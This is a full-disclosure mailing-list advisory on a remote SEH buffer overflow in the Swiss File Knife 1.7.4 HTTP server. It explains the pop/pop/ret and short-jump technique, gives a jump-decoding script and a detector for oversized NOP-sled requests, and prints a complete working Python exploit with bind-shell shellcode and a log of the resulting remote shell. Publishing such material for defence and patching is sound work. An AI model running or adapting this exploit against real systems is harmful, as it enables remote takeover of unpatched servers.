
List:       full-disclosure
Subject:    [FD] Swiss File Knife v1.7.4 HTTP - Buffer Overflow Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2015-02-28 11:08:19
Message-ID: 54F1A1A3.8050702 () vulnerability-lab ! com

Document Title:
===============
Swiss File Knife v1.7.4 HTTP - Buffer Overflow Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1441


Release Date:
=============
2015-02-27


Vulnerability Laboratory ID (VL-ID):
====================================
1441


Common Vulnerability Scoring System:
====================================
8.4


Product & Service Introduction:
===============================
Swiss File Knife - A Command Line Tools Collection that combines many functions in a single,
portable executable that belongs onto every USB stick. Search and convert text files, instant
simple FTP/HTTP server, find duplicate files, compare folders, treesize, run own commands on
all files of a folder - it's all within a single tool.

(Copy of the Vendor Homepage: http://stahlworks.com/dev/swiss-file-knife.html )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered a buffer overflow vulnerability in
the official Swiss File Knife 1.7.4 HTTP server software.


Vulnerability Disclosure Timeline:
==================================
2015-02-18: Vendor Fix/Patch (Developer Team)
2015-02-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Stahlworks
Product: Swiss File Knife - HTTP Server 1.7.4 (Windows, MacOS & Linux)


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A buffer overflow vulnerability has been discovered by an independent researcher in the official
Swiss File Knife 1.7.4 HTTP server software. The vulnerability allows a remote attacker to execute
arbitrary code with the privileges of the user running the HTTP server (sfk httpserv) by
exploiting a classic buffer overflow: an oversized request path overruns a fixed-size buffer and
overwrites the structured exception handler (SEH) record on the stack.

The payload overwrites the SEH handler with the address of a pop/pop/ret sequence (0x004f1b8d in
sfk174.exe, see the PoC below), which redirects execution into the attacker's buffer. That buffer
begins with the fixed string "unexpected: file left open for write: <attacker payload>". Its first
two bytes, "un" (0x75 0x6E in hex), decode as JNZ SHORT sfk174.005A7AC0, a conditional short jump
0x6E bytes past the instruction, which clears the rest of the fixed text and lands in the
attacker-controlled data: a NOP sled followed by the shellcode. JNZ is only taken while the zero
flag is clear; in the researcher's testing it was, so the jump reliably reaches the sled.
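
As an added illustration of the trick described above (this is not code from the advisory, the
researcher or Swiss File Knife), the following decodes the leading bytes of a fixed message prefix
as an x86 short jump and checks whether that jump clears the prefix into attacker-controlled data.
The prefix string and the jump target 0x005A7AC0 come from the advisory; the prefix address
0x005A7A50 is derived from that target (0x005A7AC0 minus the 0x70-byte jump) and is an assumption,
as are the two extra sample prefixes. It generalises beyond "un" to any Jcc/JMP rel8 opcode.

```python
# Added example; not code from the advisory, the researcher or Swiss File Knife.
# Given a fixed message prefix that ends up in front of attacker data in memory,
# decode the prefix's first two bytes as an x86 short jump and check whether that
# jump clears the prefix into the attacker-controlled bytes, as "un" does in sfk174.

# Two-byte short jumps: Jcc rel8 (0x70..0x7F) and JMP rel8 (0xEB).
SHORT_JUMPS = {
    0x70: "jo", 0x71: "jno", 0x72: "jb", 0x73: "jae", 0x74: "je", 0x75: "jne",
    0x76: "jbe", 0x77: "ja", 0x78: "js", 0x79: "jns", 0x7A: "jp", 0x7B: "jnp",
    0x7C: "jl", 0x7D: "jge", 0x7E: "jle", 0x7F: "jg", 0xEB: "jmp",
}


def decode_short_jump(data, base=0):
    """Decode data[0:2] as a rel8 jump located at address `base`.
    Returns (mnemonic, offset_from_instruction_start, absolute_target), or None
    if the first byte is not a short-jump opcode."""
    if len(data) < 2 or data[0] not in SHORT_JUMPS:
        return None
    rel8 = data[1] - 0x100 if data[1] & 0x80 else data[1]  # rel8 is signed
    offset = 2 + rel8                                       # relative to the next instruction
    return SHORT_JUMPS[data[0]], offset, base + offset


def analyze_prefix(prefix, base, controlled_len):
    """Report where the jump formed by prefix[0:2] lands, assuming `controlled_len`
    attacker bytes sit directly after the prefix in memory."""
    jump = decode_short_jump(prefix, base)
    if jump is None:
        return {"usable": False, "reason": "prefix does not start with a short-jump opcode"}
    mnemonic, offset, target = jump
    past_prefix = offset >= len(prefix)
    inside_controlled = past_prefix and offset < len(prefix) + controlled_len
    return {
        "usable": inside_controlled,
        "mnemonic": mnemonic,
        "conditional": mnemonic != "jmp",  # Jcc is only taken when its flag condition holds
        "target": target,
        "skipped_controlled_bytes": offset - len(prefix) if past_prefix else None,
    }


# Values taken from the advisory.
SFK_PREFIX = b"unexpected: file left open for write: "
# The advisory gives only the jump target 0x005A7AC0; a two-byte JNZ with rel8 0x6E
# reaching it must sit at 0x005A7AC0 - 0x70 = 0x005A7A50, assumed here as the prefix address.
SFK_PREFIX_ADDR = 0x005A7A50
# Attacker data following the prefix: the whole GET path from the PoC (nop + sc + nop2 + ret).
SFK_CONTROLLED_LEN = 128807 + 121068 + 4

if __name__ == "__main__":
    for prefix, base, ctl in (
        (SFK_PREFIX, SFK_PREFIX_ADDR, SFK_CONTROLLED_LEN),
        (b"warning: ", 0, 1000),   # constructed: 'w' 'a' decodes as JA +0x61
        (b"error: ", 0, 1000),     # constructed: 'e' is not a jump opcode
    ):
        print(repr(prefix[:12]), analyze_prefix(prefix, base, ctl))
```

For the sfk prefix the jump lands 74 bytes into the attacker data, well inside the NOP sled. The
check is only half the story: a Jcc is conditional, so the flag state at the moment the
pop/pop/ret returns decides whether it is taken (for JNZ the zero flag must be clear); a different
prefix or a different crash path can leave the flags the other way, which is why an unconditional
JMP (0xEB) prefix is the comfortable case and a Jcc prefix needs confirming in a debugger.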

The security risk of the buffer overflow vulnerability is estimated as high, with a CVSS (Common
Vulnerability Scoring System) score of 8.4.


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction or a privileged
application user account. For a security demonstration, or to reproduce the vulnerability, follow
the information and steps below.

PoC: Exploit Code (*.py)

#!/usr/bin/env python
# Swiss File Knife 1.7.4 (rev 1) Buffer Overflow
# Author: lucyoa <lucyoa[at]reverse-shell.com>
#
# Python 2 (the payload is built as a byte string via str).

# SFK's http server launched using following method:
# C:\fuzz\sfk>sfk174.exe httpserv
# SFK Instant HTTP Server. For help, type "sfk httpserv -help".
# Waiting on port 80. Try http://192.168.56.111/ in your browser.

# Exploitation:
# lucyoa@sage~/exploits/sfk174$ ./exploit.py 192.168.56.111 80
# lucyoa@sage~/exploits/sfk174$ nc 192.168.56.111 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\fuzz\sfk>ipconfig
# ipconfig
#
# Windows IP Configuration
#
# Ethernet adapter Local Area Connection:
#        Connection-specific DNS Suffix  . :
#        IP Address. . . . . . . . . . . . : 192.168.56.111
#        Subnet Mask . . . . . . . . . . . : 255.255.255.0
#        Default Gateway . . . . . . . . . :
#
# C:\fuzz\sfk>

import sys
import socket

def usage(s):
    print "%s <ip> <port>" % s
    exit(0)

def main():
    if len(sys.argv) != 3:
        usage(sys.argv[0])

    # Bind shell on TCP/4444, alphanumeric-encoded so it survives the path copy:
    # msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/alpha_mixed -t c
    # [*] x86/alpha_mixed succeeded with size 744 (iteration=1)
    sc = (
"\x89\xe0\xd9\xc5\xd9\x70\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x49\x6c\x78\x68\x4d\x59\x63\x30\x73\x30\x67\x70\x55\x30\x4b"
"\x39\x79\x75\x35\x61\x59\x42\x42\x44\x4e\x6b\x63\x62\x56\x50"
"\x6c\x4b\x71\x42\x46\x6c\x4e\x6b\x63\x62\x64\x54\x4e\x6b\x34"
"\x32\x66\x48\x36\x6f\x38\x37\x50\x4a\x57\x56\x70\x31\x39\x6f"
"\x44\x71\x39\x50\x4c\x6c\x67\x4c\x45\x31\x53\x4c\x63\x32\x46"
"\x4c\x31\x30\x5a\x61\x6a\x6f\x76\x6d\x66\x61\x39\x57\x6d\x32"
"\x6c\x30\x46\x32\x63\x67\x4e\x6b\x43\x62\x46\x70\x6c\x4b\x67"
"\x32\x45\x6c\x77\x71\x4a\x70\x6e\x6b\x43\x70\x53\x48\x4b\x35"
"\x59\x50\x42\x54\x50\x4a\x63\x31\x78\x50\x72\x70\x4c\x4b\x67"
"\x38\x54\x58\x6c\x4b\x73\x68\x31\x30\x43\x31\x38\x53\x49\x73"
"\x65\x6c\x77\x39\x4e\x6b\x34\x74\x4c\x4b\x67\x71\x49\x46\x70"
"\x31\x59\x6f\x35\x61\x39\x50\x4c\x6c\x5a\x61\x7a\x6f\x44\x4d"
"\x35\x51\x4a\x67\x47\x48\x4b\x50\x63\x45\x78\x74\x46\x63\x31"
"\x6d\x4b\x48\x67\x4b\x63\x4d\x34\x64\x62\x55\x49\x72\x72\x78"
"\x6e\x6b\x70\x58\x71\x34\x67\x71\x79\x43\x61\x76\x6e\x6b\x44"
"\x4c\x50\x4b\x4c\x4b\x42\x78\x67\x6c\x63\x31\x68\x53\x6c\x4b"
"\x73\x34\x6e\x6b\x57\x71\x38\x50\x6d\x59\x70\x44\x37\x54\x57"
"\x54\x61\x4b\x43\x6b\x63\x51\x32\x79\x32\x7a\x32\x71\x59\x6f"
"\x6d\x30\x72\x78\x71\x4f\x32\x7a\x6c\x4b\x44\x52\x7a\x4b\x4d"
"\x56\x43\x6d\x53\x58\x75\x63\x70\x32\x67\x70\x33\x30\x63\x58"
"\x72\x57\x72\x53\x56\x52\x73\x6f\x30\x54\x43\x58\x30\x4c\x54"
"\x37\x45\x76\x56\x67\x59\x6f\x4a\x75\x4f\x48\x6e\x70\x76\x61"
"\x77\x70\x63\x30\x77\x59\x5a\x64\x33\x64\x62\x70\x75\x38\x65"
"\x79\x6f\x70\x30\x6b\x43\x30\x6b\x4f\x78\x55\x30\x50\x52\x70"
"\x72\x70\x42\x70\x31\x50\x72\x70\x57\x30\x30\x50\x62\x48\x38"
"\x6a\x66\x6f\x6b\x6f\x4b\x50\x6b\x4f\x49\x45\x4b\x39\x69\x57"
"\x55\x61\x49\x4b\x32\x73\x65\x38\x43\x32\x53\x30\x62\x31\x43"
"\x6c\x4d\x59\x59\x76\x51\x7a\x44\x50\x46\x36\x50\x57\x70\x68"
"\x5a\x62\x4b\x6b\x66\x57\x43\x57\x49\x6f\x58\x55\x62\x73\x31"
"\x47\x35\x38\x4e\x57\x4d\x39\x66\x58\x39\x6f\x4b\x4f\x59\x45"
"\x36\x33\x73\x63\x36\x37\x31\x78\x30\x74\x68\x6c\x35\x6b\x69"
"\x71\x39\x6f\x4a\x75\x62\x77\x6c\x49\x68\x47\x71\x78\x44\x35"
"\x30\x6e\x32\x6d\x71\x71\x39\x6f\x49\x45\x43\x58\x71\x73\x72"
"\x4d\x50\x64\x53\x30\x6e\x69\x4d\x33\x36\x37\x63\x67\x33\x67"
"\x46\x51\x4b\x46\x30\x6a\x55\x42\x62\x79\x50\x56\x6d\x32\x6b"
"\x4d\x45\x36\x7a\x67\x70\x44\x66\x44\x65\x6c\x65\x51\x65\x51"
"\x6c\x4d\x72\x64\x77\x54\x76\x70\x78\x46\x55\x50\x37\x34\x66"
"\x34\x56\x30\x46\x36\x53\x66\x33\x66\x43\x76\x51\x46\x32\x6e"
"\x56\x36\x63\x66\x50\x53\x71\x46\x61\x78\x70\x79\x58\x4c\x55"
"\x6f\x4d\x56\x69\x6f\x4b\x65\x4f\x79\x4b\x50\x70\x4e\x70\x56"
"\x37\x36\x69\x6f\x50\x30\x61\x78\x34\x48\x4c\x47\x35\x4d\x61"
"\x70\x59\x6f\x5a\x75\x6f\x4b\x4a\x50\x4f\x45\x49\x32\x62\x76"
"\x45\x38\x6e\x46\x6f\x65\x6f\x4d\x4d\x4d\x39\x6f\x7a\x75\x77"
"\x4c\x65\x56\x63\x4c\x76\x6a\x4f\x70\x4b\x4b\x79\x70\x44\x35"
"\x64\x45\x6f\x4b\x72\x67\x46\x73\x73\x42\x50\x6f\x72\x4a\x47"
"\x70\x32\x73\x49\x6f\x38\x55\x41\x41")

    # 0x004f1b8d from sfk174.exe: pop/pop/ret, written over the SEH handler.
    # The address ends in a null byte, so it is placed last in the buffer.
    ret = "\x8d\x1b\x4f\x00"

    # NOP sled up to the shellcode (sled + shellcode = 128807 bytes), then
    # padding out to the SEH record, then the handler overwrite.
    nop = "\x90"*(128807 - len(sc))
    nop2 = "\x90"*121068

    buff = nop + sc + nop2 + ret
    payload = "GET /"+buff+" HTTP/1.1\r\n\r\n"

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1], int(sys.argv[2])))
    # sendall: a single send() may write only part of a ~250 KB payload.
    s.sendall(payload)
    s.close()

if __name__ == "__main__":
    main()
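
The request the PoC sends is easy to recognise on the wire: a request-target of roughly 250 KB
that is almost entirely 0x90 bytes. The following is an added example, not part of the advisory
or of the author's exploit, that parses raw HTTP request lines and flags that shape. The length
threshold, the minimum sled length and both sample requests are constructed assumptions; the
second sample only mirrors the PoC's layout ("GET /" + sled + ret + " HTTP/1.1") with a shorter
sled and no shellcode.

```python
# Added example; not part of the advisory or of the author's exploit.
# Flags raw HTTP requests shaped like the PoC above: an oversized request-target
# carrying a long run of 0x90 (NOP) bytes. Thresholds and samples are assumptions.

MAX_TARGET_LEN = 8192   # assumed policy limit; the PoC's request-target is ~250 KB
SLED_MIN_RUN = 64       # assumed: this many consecutive NOPs is treated as a sled


def parse_request_line(raw):
    """Split the first line of a raw HTTP request into (method, target, version).
    Works on bytes, and splits the version off from the right, because an exploit
    request-target is binary and may itself contain spaces."""
    line = raw.split(b"\r\n", 1)[0]
    method, sep, rest = line.partition(b" ")
    if not sep:
        return None
    target, sep, version = rest.rpartition(b" ")
    if not sep or not version.startswith(b"HTTP/"):
        return None
    return method, target, version


def longest_run(data, value):
    """Length of the longest run of byte `value` in `data`."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        if cur > best:
            best = cur
    return best


def inspect_request(raw):
    """Return a list of findings for one raw request; empty means nothing suspicious."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return ["malformed request line"]
    method, target, version = parsed
    findings = []
    if len(target) > MAX_TARGET_LEN:
        findings.append("request-target is %d bytes (limit %d)" % (len(target), MAX_TARGET_LEN))
    run = longest_run(target, 0x90)
    if run >= SLED_MIN_RUN:
        findings.append("NOP sled: %d consecutive 0x90 bytes in request-target" % run)
    binary = sum(1 for b in target if b < 0x20 or b > 0x7E)
    if binary:
        findings.append("%d non-printable bytes in request-target" % binary)
    return findings


# Constructed samples (not captured traffic).
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: 192.168.56.111\r\n\r\n"
# Same shape as the PoC's "GET /" + nop + sc + nop2 + ret, with the sled shortened
# and the shellcode omitted; the last four bytes are the PoC's ret value.
POC_LIKE = b"GET /" + b"\x90" * 10000 + b"\x8d\x1b\x4f\x00" + b" HTTP/1.1\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("poc-like", POC_LIKE)):
        print(name, inspect_request(req) or "clean")
```

The indicators are deliberately generic (size, sled, binary content) rather than a signature on
the 0x004f1b8d handler address, which changes with every rebuild of the target and is trivial to
swap for another pop/pop/ret; the length check alone already catches the PoC, whose path is far
beyond anything a legitimate client sends to sfk httpserv. Feed it the reassembled TCP payload,
not individual segments, or the request line will be cut short.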


Solution - Fix & Patch:
=======================
2015-02-18: Vendor Fix/Patch (Developer Team)

Update: http://sourceforge.net/projects/swissfileknife/files/1-swissfileknife/1.7.4/


Security Risk:
==============
The security risk of the remote buffer overflow software vulnerability is estimated as high.
(CVSS 8.4)


Credits & Authors:
==================
lucyoa - [lucyoa[at]reverse-shell.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty.
Vulnerability Lab disclaims all warranties, either expressed or implied, including the
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its
suppliers are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if Vulnerability-Lab or its
suppliers have been advised of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires
authorization from Vulnerability Laboratory. Permission to electronically redistribute this
alert in its unmodified form is granted. All other rights, including the use of other media,
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is trademark of
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com)
to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

